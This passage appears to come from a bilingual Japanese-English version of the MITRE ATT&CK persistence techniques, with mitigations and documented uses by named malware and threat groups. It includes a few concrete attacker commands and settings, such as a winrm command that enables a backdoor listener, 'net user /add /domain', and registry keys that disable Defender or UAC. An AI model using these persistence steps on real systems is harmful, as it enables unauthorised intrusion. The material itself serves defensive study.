Remcos has full control of the Registry, including the ability to modify it. DarkComet adds a Registry value for its installation routine to the Registry Key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System Enable LUA=”0”</code> and <code>HKEY_CURRENT_USER\Software\DC3_FEXEC</code>. NanoCore has the capability to edit the Registry. GreyEnergy modifies conditions in the Registry and adds keys. Exaramel for Windows adds the configuration to the Registry in XML format. Cardinal RAT sets <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load</code> to point to its executable. zwShell can modify the Registry. KONNI has modified registry keys of ComSysApp, Svchost, and xmlProv on the machine to gain persistence. HOPLIGHT has modified Managed Object Format (MOF) files within the Registry to run specific commands and create persistence on the system. njRAT can create, delete, or modify a specified Registry key or value. Ursnif has used Registry modifications as part of its installation routine. LoJax has modified the Registry key <code>‘HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute’</code> from <code>‘autocheck autochk *’</code> to <code>‘autocheck autoche *’</code>. ZxShell can create Registry entries to enable services to run. PoetRAT has made registry modifications to alter its behavior upon execution. Attor's dispatcher can modify the Run registry key. PowerShower has added a registry key so future powershell.exe instances are spawned off-screen by default, and has removed all registry entries that are left behind during the dropper process. ShimRat has registered two registry keys for shim databases. Lokibot has modified the Registry as part of its UAC bypass process. Metamorfo has written process names to the Registry, disabled IE browser features, deleted Registry keys, and changed the ExtendedUIHoverTime key. Netwalker can add the following registry entry: <code>HKEY_CURRENT_USER\SOFTWARE\{8 random characters}</code>. TajMahal can set the <code>KeepPrintedJobs</code> attribute for configured printers in <code>SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers</code> to enable document stealing. Valak has the ability to modify the Registry key <code>HKCU\Software\ApplicationContainer\Appsw64</code> to store information regarding the C2 server and downloads. CrackMapExec can create a registry key using wdigest. REvil can modify the Registry to save encryption parameters and system information. PipeMon has modified the Registry to store its encrypted payload. RegDuke can create seemingly legitimate Registry key to store its encryption key. Pillowmint has modified the Registry key <code>HKLM\SOFTWARE\Microsoft\DRM</code> to store a malicious payload. PolyglotDuke can write encrypted JSON configuration files to the Registry. CSPY Downloader can write to the Registry under the <code>%windir%</code> variable to execute tasks. Grandoreiro can modify the Registry to store its configuration at `HKCU\Software\` under frequently changing names including <code>%USERNAME%</code> and <code>ToolTech-RM</code>. SLOTHFULMEDIA can add, modify, and/or delete registry keys. It has changed the proxy configuration of a victim system by modifying the <code>HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap</code> registry. HyperStack can add the name of its communication pipe to <code>HKLM\SYSTEM\\CurrentControlSet\\Services\\lanmanserver\\parameters\NullSessionPipes</code>. SUNBURST had commands that allow an attacker to write or delete registry keys, and was observed stopping services by setting their <code>HKLM\SYSTEM\CurrentControlSet\services\\[service_name]\\Start</code> registry entries to value 4. It also deleted previously-created Image File Execution Options (IFEO) Debugger registry values and registry keys related to HTTP proxy to clean up traces of its activity. TEARDROP modified the Registry to create a Windows service for itself on a compromised host. EVILNUM can make modifications to the Regsitry for persistence. Explosive has a function to write itself to Registry values. BitPaymer can set values in the Registry to help in execution. Caterpillar WebShell has a command to modify a Registry key. MegaCortex has added entries to the Registry for ransom contact information. Waterbear has deleted certain values from the Registry to load a malicious DLL. Pysa has modified the registry key “SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System” and added the ransom note. Sibot has modified the Registry to install a second-stage script in the <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\sibot</code>. ShadowPad can modify the Registry to store and maintain a configuration block and virtual file system. Stuxnet can create registry keys to load driver files. Conficker adds keys to the Registry at <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services</code> and various other Registry locations. Clop can make modifications to Registry keys. WastedLocker can modify registry values within the <code>Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap</code> registry key. Chaes can modify Registry values to stored information and establish persistence. Avaddon modifies several registry keys for persistence and UAC bypass. SMOKEDHAM has modified registry keys for persistence, to enable credential caching for credential access, and to facilitate lateral movement via RDP. QakBot can modify the Registry to store its configuration information in a randomly named subkey under <code>HKCU\Software\Microsoft</code>. Clambling can set and delete Registry keys. RCSession can write its configuration file to the Registry. SysUpdate can write its configuration file to <code>Software\Classes\scConfig</code> in either <code>HKEY_LOCAL_MACHINE</code> or <code>HKEY_CURRENT_USER</code>. Pandora can write an encrypted token to the Registry to enable processing of remote commands. ThreatNeedle can modify the Registry to save its configuration data as the following RC4-encrypted Registry key: `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameCon`. Gelsemium can modify the Registry to store its components. TinyTurla can set its configuration parameters in the Registry. KOCTOPUS has added and deleted keys from the Registry. WarzoneRAT can create `HKCU\Software\Classes\Folder\shell\open\command` as a new registry key during privilege escalation. DarkWatchman can modify Registry values to store configuration strings, keylogger, and output of components. CharmPower can remove persistence-related artifacts from the Registry. AADInternals can modify registry keys as part of setting a new pass-through authentication agent. Ferocious has the ability to add a Class ID in the current user Registry hive to enable persistence mechanisms. Neoichor has the ability to configure browser settings by modifying Registry entries under `HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer`. SILENTTRINITY can modify registry keys, including to enable or disable Remote Desktop Protocol (RDP). HermeticWiper has the ability to modify Registry keys to disable crash dumps, colors for compressed files, and pop-up information about folders and desktop items. Tarrask is able to delete the Security Descriptor (`SD`) registry subkey in order to “hide” scheduled tasks. Amadey has overwritten registry keys for persistence. DCSrv has created Registry keys for persistence. Mori can write data to `HKLM\Software\NFC\IPA` and `HKLM\Software\NFC\` and delete Registry values. PcShare can delete its persistence mechanisms from the registry. Prestige has the ability to register new registry keys for a new extension handler via `HKCR\.enc` and `HKCR\enc\shell\open\command`. metaMain can write the process ID of a target process into the `HKEY_LOCAL_MACHINE\SOFTWARE\DDE\tpid` Registry value as part of its reflective loading activity. Mafalda can manipulate the system registry on a compromised host. DarkTortilla has modified registry keys for persistence. BlackCat has the ability to add the following registry key on compromised networks to maintain persistence: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services \LanmanServer\Paramenters` Black Basta has modified the Registry to enable itself to run in safe mode, to change the icons and file extensions for encrypted files, and to add the malware path for persistence. NightClub can modify the Registry to set the ServiceDLL for a service created by the malware for persistence. The Samurai loader component can create multiple Registry keys to force the svchost.exe process to load the final backdoor. NPPSPY modifies the Registry to record the malicious listener for output from the Winlogon process. IPsec Helper can make arbitrary changes to registry keys based on provided input. CHIMNEYSWEEP can use the Windows Registry Environment key to change the `%windir%` variable to point to `c:\Windows` to enable payload execution. ShrinkLocker modifies various registry keys associated with system logon and BitLocker functionality to effectively lock-out users following disk encryption. BlackByte Ransomware modifies the victim Registry to prevent system recovery. BlackByte 2.0 Ransomware modifies the victim Registry to allow for elevated execution. Kapeka writes persistent configuration information to the victim host registry. LockBit 2.0 can create Registry keys to bypass UAC and for persistence. TRANSLATEXT has modified the following registry key to install itself as the value, granting permission to install specified extensions: ` HKCU\Software\Policies\Google\Chrome\ExtensionInstallForcelist`. LockBit 3.0 can change the Registry values for Group Policy refresh time, to disable SmartScreen, and to disable Windows Defender. BOOKWORM has modified Registry key values as part of its created service `DeviceSync`. HIUPAN has modified registry keys to ensure hidden files and extensions are not visible through the modification of `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced`. Qilin can make Registry modifications to share networked drives between elevated and non-elevated processes and to increase the number of outstanding network requests per client. Qilin can also modify `HKEY_CURRENT_USER\Control Panel\Desktop\Wallpaper` to enable posting of ransom messages. Embargo has modified and deleted Registry keys to add services, and to disable Security Solutions such as Windows Defender. HiddenFace can store its configuration file in the Registry. NOOPLDR can store its payload in the Registry using a random hex string in `HKCU\SOFTWARE\Microsoft\COM3`. MuddyViper has the ability to clear the Registry values in the Windows Startup folder that were previously set for persistence. 敵対者は、外部公開されたリモートサービスを悪用して永続的にアクセスすることがある。 Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management and VNC can also be used externally. 危険なWebコンテンツへのアクセスを制限する。 ネットワークを分割し、横展開や影響範囲を限定する。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 ネットワーク越しのリソースアクセスを制限する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 外部リモートサービスに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Night Dragon, threat actors used compromised VPN accounts to gain access to victim systems. During CostaRicto, the threat actors set up remote tunneling using an SSH tool to maintain access to a compromised environment. During Operation CuckooBees, the threat actors enabled WinRM over HTTP/HTTPS as a backup persistence mechanism using the following command: `cscript //nologo "C:\Windows\System32\winrm.vbs" set winrm/config/service@{EnableCompatibilityHttpsListener="true"}`. During Operation Wocao, threat actors used stolen credentials to connect to the victim's network via VPN. For the SolarWinds Compromise, APT29 used compromised identities to access networks via SSH, VPNs, and other remote access tools. During C0027, Scattered Spider used Citrix and VPNs to persist in compromised environments. During the 2015 Ukraine Electric Power Attack, Sandworm Team installed a modified Dropbear SSH client as the backdoor to target systems. During the C0032 campaign, TEMP.Veles used VPN access to persist in the victim environment. ArcaneDoor used WebVPN sessions commonly associated with Clientless SSLVPN services to communicate to compromised devices. During the 2025 Poland Wiper Attacks, threat actors leveraged the FortiGate VPN interface that was exposed to the internet to gain access to the victim environment. Ke3chang has gained access through VPNs including with compromised accounts and stolen VPN certificates. APT28 has used Tor and a variety of commercial VPN services to route brute force authentication attempts. APT29 has used compromised identities to access networks via VPNs and Citrix. APT18 actors leverage legitimate credentials to log into external remote services. Threat Group-3390 actors look for and use VPN profiles during an operation to access the network using external VPN services. Threat Group-3390 has also obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network. Sandworm Team has used Dropbear SSH with a hardcoded backdoor password to maintain persistence within the target network. Sandworm Team has also used VPN tunnels established in legitimate software company infrastructure to gain access to internal networks of that software company's users. Dragonfly has used VPNs and Outlook Web Access (OWA) to maintain access to victim networks. OilRig uses remote services such as VPN, Citrix, or OWA to persist in an environment. FIN5 has used legitimate VPN, Citrix, or VNC credentials to maintain access to a victim environment. Leviathan has used external remote services such as virtual private networks (VPN) to gain initial access. GALLIUM has used VPN services, including SoftEther VPN, to access and maintain persistence in victim environments. Kimsuky has used RDP to establish persistence. APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service. APT-C-36 has used VPNs in their operational infrastructure. Wizard Spider has accessed victim networks by using stolen credentials to access the corporate VPN infrastructure. Chimera has used legitimate credentials to login to an external VPN, Citrix, SSH, and other remote services. GOLD SOUTHFIELD has used publicly-accessible RDP and remote management and monitoring (RMM) servers to gain access to victim machines. TeamTNT has used open-source tools such as Weave Scope to target exposed Docker API ports and gain initial access to victim environments. TeamTNT has also targeted exposed kubelets for Kubernetes environments. Ember Bear have used VPNs both for initial access to victim environments and for persistence within them following compromise. LAPSUS$ has gained access to internet-facing systems and applications, including virtual private network (VPN), remote desktop protocol (RDP), and virtual desktop infrastructure (VDI) including Citrix. Scattered Spider has leveraged legitimate remote management tools to maintain persistent access. FIN13 has gained access to compromised environments via remote access services such as the corporate virtual private network (VPN). Volt Typhoon has used VPNs to connect to victim environments and enable post-exploitation actions. Akira uses compromised VPN accounts for initial access to victim networks. Play has used Remote Desktop Protocol (RDP) and Virtual Private Networks (VPN) for initial access. Sea Turtle has used external-facing SSH to achieve initial access to the IT environments of victim organizations. Velvet Ant has leveraged access to internet-facing remote services to compromise and retain access to victim environments. VOID MANTICORE has leveraged public facing VPN infrastructure to gain initial access to victim environments. Linux Rabbit attempts to gain access to the server via SSH. Kinsing was executed in an Ubuntu container deployed via an open Docker daemon API. Doki was executed through an open Docker daemon API port. Hildegard was executed through an unsecure kubelet that allowed anonymous access to the victim environment. Mafalda can establish an SSH connection from a compromised host to a server. 敵対者は、新規アカウントを作成してアクセスを維持することがある。 Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. 敵対者は、ローカルアカウントを作成して永続化することがある。Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. 敵対者は、ドメインアカウントを作成して永続化することがある。Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the <code>net user /add /domain</code> command can be used to create a domain account. 敵対者は、クラウドアカウントを作成して永続化することがある。Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system. 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 OSを安全に構成し、攻撃対象領域を縮小する。 ネットワークを分割し、横展開や影響範囲を限定する。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 アカウントの作成に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the 2016 Ukraine Electric Power Attack, Sandworm Team added a login to a SQL Server with `sp_addlinkedsrvlogin`. Indrik Spider used <code>wmic.exe</code> to add a new user to the system. Scattered Spider creates new user identities within the compromised organization. Salt Typhoon has created Linux-level users on compromised network devices through modification of `/etc/shadow` and `/etc/passwd`. LockBit 2.0 has been observed creating accounts for persistence using simple names like "a". 敵対者は、Officeアプリの起動機構（テンプレート/ルール等）を悪用して永続化することがある。 Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins. 敵対者は、Officeテンプレートのマクロを悪用して永続化することがある。Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. 敵対者は、Office Test機能を悪用して永続化することがある。Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation. 敵対者は、Outlookフォームを悪用して永続化することがある。Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form. 敵対者は、Outlookホームページを悪用して永続化することがある。Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page. 敵対者は、Outlookルールを悪用して永続化することがある。Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user. 敵対者は、Officeアドインを悪用して永続化することがある。Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. エンドポイントで悪意ある挙動を検出・防止する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 ソフトウェアを安全に構成し、悪用を防ぐ。 Officeアプリ起動に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Gamaredon Group has inserted malicious macros into existing documents, providing persistence when they are reopened. Gamaredon Group has loaded the group's previously delivered VBA project by relaunching Microsoft Outlook with the <code>/altvba</code> option, once the Application.Startup event is received. APT32 have replaced Microsoft Outlook's VbaProject.OTM file to install a backdoor macro for persistence. 敵対者は、ブラウザやIDEの拡張機能を悪用して永続化することがある。 Adversaries may abuse software extensions to establish persistent access to victim systems. Software extensions are modular components that enhance or customize the functionality of software applications, including web browsers, Integrated Development Environments (IDEs), and other platforms. Extensions are typically installed via official marketplaces, app stores, or manually loaded by users, and they often inherit the permissions and access levels of the host application. 敵対者は、ブラウザ拡張機能を悪用して永続化や情報窃取を行うことがある。Adversaries may abuse internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality to and customize aspects of internet browsers. They can be installed directly via a local file or custom URL or through a browser's app store - an official online platform where users can browse, install, and manage extensions for a specific web browser. Extensions generally inherit the web browser's permissions previously granted. Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores, so it may not be difficult for malicious extensions to defeat automated scanners. Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary-controlled server or manipulate the mobile configuration file to silently install additional extensions. 敵対者は、IDE拡張機能を悪用して永続化やコード実行を行うことがある。Adversaries may abuse an integrated development environment (IDE) extension to establish persistent access to victim systems. IDEs such as Visual Studio Code, IntelliJ IDEA, and Eclipse support extensions - software components that add features like code linting, auto-completion, task automation, or integration with tools like Git and Docker. A malicious extension can be installed through an extension marketplace (i.e., Compromise Software Dependencies and Development Tools) or side-loaded directly into the IDE. ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 ソフトウェアのインストールを制限し、不正なプログラム導入を防ぐ。 許可されていないコードの実行を防止する。 システムやアカウントを監査し、不正な活動を検出する。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 ソフトウェア拡張機能に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、Windowsのバックグラウンドインテリジェント転送サービス(BITS)を悪用してダウンロードや実行・永続化を行うことがある。 Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM). BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. アカウントの作成・権限・ライフサイクルを適切に管理する。 OSを安全に構成し、攻撃対象領域を縮小する。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 BITSジョブに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Patchwork has used BITS jobs to download malicious payloads. Leviathan has used BITSAdmin to download additional tools. APT39 has used the BITS protocol to exfiltrate stolen data from a compromised host. APT41 used BITSAdmin to download and install payloads. Wizard Spider has used batch scripts that utilizes WMIC to execute a BITSAdmin transfer of a ransomware payload to each compromised machine. Cobalt Strike can download a hosted "beacon" payload using BITSAdmin. BITSAdmin can be used to create BITS Jobs to launch a malicious process. A JPIN variant downloads the backdoor payload via the BITS service. UBoatRAT takes advantage of the /SetNotifyCmdLine option in BITSAdmin to ensure it stays running on a system to maintain persistence. Bazar has been downloaded via Windows BITS functionality. Egregor has used BITSadmin to download and execute malicious DLLs. MarkiRAT can use BITS Utility to connect with the C2 server. ProLock can use BITS jobs to download its malicious payload. 敵対者は、特定のパケット列を合図にバックドアを起動して検知を回避することがある。 Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. Port Knocking), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. 敵対者は、特定ポートへの接続列（ポートノッキング）を合図にバックドアを起動することがある。Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. 敵対者は、ソケットフィルタを用いて特定パケットを合図に動作することがある。Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell. ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 トラフィックシグナリングに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Cutting Edge, threat actors sent a magic 48-byte sequence to enable the PITSOCK backdoor to communicate via the `/tmp/clientsDownload.sock` socket. During RedPenguin, UNC3886 leveraged malware capable of inpecting packets for a magic-string to activate backdoor functionalities. Kimsuky has used TRANSLATEXT to redirect clients to legitimate Gmail, Naver or Kakao pages if the clients connect with no parameters. Mustang Panda has utilized a magic value in C2 communications and only executes in memory when response packets match specific values of “17 03 03” or “46 77 4d”. UNC3886 has used the TABLEFLIP traffic redirection utility to listen for specialized command packets on compromised FortiManager devices. Uroburos can intercept the first client to server packet in the 3-way TCP handshake to determine if the packet contains the correct unique value for a specific Uroburos implant. If the value does not match, the packet and the rest of the TCP session are passed to the legitimate listening application. Chaos provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port. Umbreon provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet. Winnti for Linux has used a passive listener, capable of identifying a specific magic value before executing tasking, as a secondary command and control (C2) mechanism. Ryuk has used Wake-on-Lan to power on turned off systems for lateral movement. SYNful Knock can be sent instructions via special packets to change its functionality. Code for new functionality can be included in these messages. Penquin will connect to C2 only after sniffing a "magic packet" value in TCP or UDP packets matching specific conditions. Kobalos is triggered by an incoming TCP connection to a legitimate service from a specific source port. Pandora can identify if incoming HTTP traffic contains a token and if so it will intercept the traffic and process the received command. ZIPLINE can identify a specific string in intercepted network traffic, `SSH-2.0-OpenSSH_0.3xx.`, to trigger its command functionality. BUSHWALK can modify the `DSUserAgentCap.pm` Perl module on Ivanti Connect Secure VPNs and either activate or deactivate depending on the value of the user agent in incoming HTTP requests. TRANSLATEXT has redirected clients to legitimate Gmail, Naver or Kakao pages if the clients connect with no parameters. J-magic can monitor TCP traffic for packets containing one of five different predefined parameters and will spawn a reverse shell if one of the parameters and the proper response string to a subsequent challenge is received. The REPTILE reverse shell component can listen for a specialized packet in TCP, UDP, or ICMP for activation. PUBLOAD has utilized a magic value in C2 communications and only executes in memory when response packets match specific values of 17 03 03. PUBLOAD has also used magic bytes consisting of 46 77 4d. TONESHELL has utilized a magic value in C2 communications and only executes in memory when response packets match specific values. BRUSHFIRE has monitored inbound VPN traffic to compromised appliances until specific inbound packets contain a specific magic string/pattern instead of external beaconing. 敵対者は、サーバーソフトのコンポーネント（Webシェル等）を悪用して永続化することがある。 Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications. 敵対者は、SQLストアドプロシージャを悪用して永続化することがある。Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted). 敵対者は、メールサーバのトランスポートエージェントを悪用して永続化することがある。Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails. Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. 敵対者は、Webシェルを設置してサーバへのアクセスを維持することがある。Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. 敵対者は、IISコンポーネント（モジュール等）を悪用して永続化することがある。Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers. 敵対者は、ターミナルサービスDLLを悪用して永続化することがある。Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP. 敵対者は、vSphereインストールバンドル(VIB)を悪用して永続化することがある。Adversaries may abuse vSphere Installation Bundles (VIBs) to establish persistent access to ESXi hypervisors. VIBs are collections of files used for software distribution and virtual system management in VMware environments. Since ESXi uses an in-memory filesystem where changes made to most files are stored in RAM rather than in persistent storage, these modifications are lost after a reboot. However, VIBs can be used to create startup tasks, apply custom firewall rules, or deploy binaries that persist across reboots. Typically, administrators use VIBs for updates and system maintenance. アカウントの作成・権限・ライフサイクルを適切に管理する。 レジストリキーの権限を制限し、不正な改変を防ぐ。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 コード署名を検証し、未署名・不正なコードの実行を防ぐ。 ブートの完全性を検証し、起動段階での改ざんを防ぐ。 システムやアカウントを監査し、不正な活動を検出する。 サーバーソフトウェアコンポーネントに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、コンテナ/VMのイメージに悪意あるコードを埋め込んで永続化することがある。 Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike Upload Malware, this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image. 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 コード署名を検証し、未署名・不正なコードの実行を防ぐ。 システムやアカウントを監査し、不正な活動を検出する。 内部イメージへの埋め込みに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、OS起動前のブート機構（ファームウェア/ブートキット等）を悪用して永続化することがある。 Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control. 敵対者は、システムファームウェアを改変して永続化や防御妨害を行うことがある。Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. 敵対者は、コンポーネントファームウェアを改変して永続化することがある。Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to System Firmware but conducted upon other system components/devices that may not have the same capability or level of integrity checking. 敵対者は、ブートキットを用いて起動段階で永続化することがある。Adversaries may use bootkits to persist on systems. A bootkit is a malware variant that modifies the boot sectors of a hard drive, allowing malicious code to execute before a computer's operating system has loaded. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly. 敵対者は、ROMMONを改変(ROMMONkit)してネットワーク機器で永続化することがある。Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. 敵対者は、TFTPブートを悪用してシステムイメージを改変・永続化することがある。Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images. 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 ネットワーク越しのリソースアクセスを制限する。 ブートの完全性を検証し、起動段階での改ざんを防ぐ。 システムやアカウントを監査し、不正な活動を検出する。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 OS起動前ブートに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、サービスやデーモン等のシステムプロセスを作成/変更して永続化することがある。 Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as 